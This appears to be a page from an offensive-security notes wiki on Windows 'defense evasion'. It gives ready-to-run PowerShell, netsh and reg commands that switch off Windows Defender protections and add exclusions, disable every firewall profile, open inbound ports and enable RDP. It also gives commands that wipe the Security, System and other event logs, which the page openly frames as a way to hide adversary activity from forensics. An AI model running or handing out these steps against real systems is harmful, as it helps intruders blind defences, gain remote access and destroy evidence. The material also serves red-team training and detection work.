Defense evasion
Windows Defender
The following PowerShell command can be used to switch off Windows Defender
real-time protection:
# Add the specified folder to Windows Defender's exclusion list.
# The exclusion list can be retrieved using: Get-MpPreference | Ft ExclusionPath
Add-MpPreference -ExclusionPath "<PATH>"
# Disables Windows Defender real-time protection.
Set-MpPreference -DisableRealtimeMonitoring $true
# Disables, in addition to real-time protection, various other protections offered by Microsoft Defender (scanning of scripts and downloaded files, automatic sample submission, etc.).
Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Windows Firewall
To check whether the Windows Firewall is enabled on a server or computer, the following command can be used as Administrator
/ SYSTEM
:
# Show the profile applied to each network adapter
netsh advfirewall monitor show currentprofile
# Windows Firewall state for all profile (Public / Domain / Private)
netsh advfirewall show allprofiles
Get-NetFirewallProfile
# Show all rules for the given profile
netsh advfirewall firewall show rule profile=<public | private | domain | any | ...> name=all
Get-NetFirewallProfile -Name <Public | Private | Domain | * | ...> | Get-NetFirewallRule
By default, three separate listings are present: Domain profile settings, private profile settings and public profile settings. With the private profile, applied to a network adapter when it is connected to a network that is identified by the user or administrator as a private network, Windows enables network discovery features, allows file sharing and other networked features. The public profile, applied to a network adapter by default or if specified so by an user or administrator, is the most restrictive profile. In the default public profile, Windows will block all inbound connections to programs that are not on the list of allowed programs. Finally, the Domain profile is used when a server or computer is joined to an Active Directory domain. In this environment, firewall settings are typically (but not necessarily) controlled by a network administrator.
Windows blocks inbound connections and allows outbound connections for all profiles by default.
To disable the firewall use the following commands:
# Disable current profile
netsh advfirewall set currentprofile state off
# Disable all profiles
netsh advfirewall set allprofiles state off
Set-NetFirewallProfile -All -Enabled False
# Disable the private, public and domain profiles
netsh advfirewall set privateprofile state off
netsh advfirewall set publicprofile state off
netsh advfirewall set domainprofile state off
Set-NetFirewallProfile -Profile <Domain | Private | Public | PROFILE NAME> -Enabled False
To open a specific port, or a range, use the following command:
netsh advfirewall firewall add rule name="<RULE_NAME>" protocol=TCP dir=in localport=<PORT> action=allow
Activate RDP
RDP can be enabled / disabled with out the need to restart the system with the reg
utility:
# Check if RDP is enabled
netstat /p tcp /a | findstr 3389
# If RDP is enabled, registry value should be equal to 0x0
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
# Disable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
Windows logs clearing
Windows event logs track the activity and a number of operations conducted on the system.
The following notable hives, located in %systemroot%\System32\winevt\Logs
, may be of interest for forensics analysis (and should thus be deleted in priority to hide adversary activity):
Security.evtx
: users logon / logoff, local accounts and groups operations, process creation with command line if activated, etc.System.evtx
: Windows service creation operations (creation, execution, deletion, etc.)Windows PowerShell.evtx
andMicrosoft-Windows-PowerShell%4Operational.evtx
: PowerShell activity, with a varying level of information depending on the system configuration (activation of non defaultModule Logging
,Script block logging
, etc.)Microsoft-Windows-TaskScheduler%4Operational.evtx
: scheduled tasks operations (registration, execution, deletion, etc.).Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx
,Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational
, andMicrosoft-WindowsRemoteDesktopServicesRdpCoreTS%4Operational.evtx
:RDP
activity such as access to the Windows login screen and remote interactive logon through.Microsoft-Windows-WinRM%4Operational
Microsoft-Windows-Shell-Core%4Operational.evtx
: programs executed through theRun
/RunOnce
ASEPs
registry keys.Microsoft-Windows-AppLocker%4EXE and DLL.evtx
andMicrosoft-Windows-AppLocker%4MSI and Script
(and othersMicrosoft-Windows-AppLocker%4*.evtx
): execution of binaries and scripts ifAppLocker
is activated inAudit only
mode (non default).
Note that upon clearing of some EVTX
hives (such as the Security
and System
hives), specific events will be generated to keep trace of the logs clearing. Refer to the [DFIR] Windows - EVTX integrity
note for more information on the Windows events generated by events deletion.
# Clears the specified hive using the wevtutil built-in utility.
wevtutil cl <security | system | HIVE_NAME>
# Clears the specified hive using the Clear-EventLog PowerShell cmdlet.
Clear-EventLog -LogName <Security | System | HIVE_NAME>
# Clears all the logs of the registered ETW provider.
$AllLogs = Get-EventLog -List | ForEach-Object {$_.Log}
$AllLogs | ForEach-Object {Clear-EventLog -LogName $_ }
https://github.com/QAX-A-Team/EventCleaner
Last updated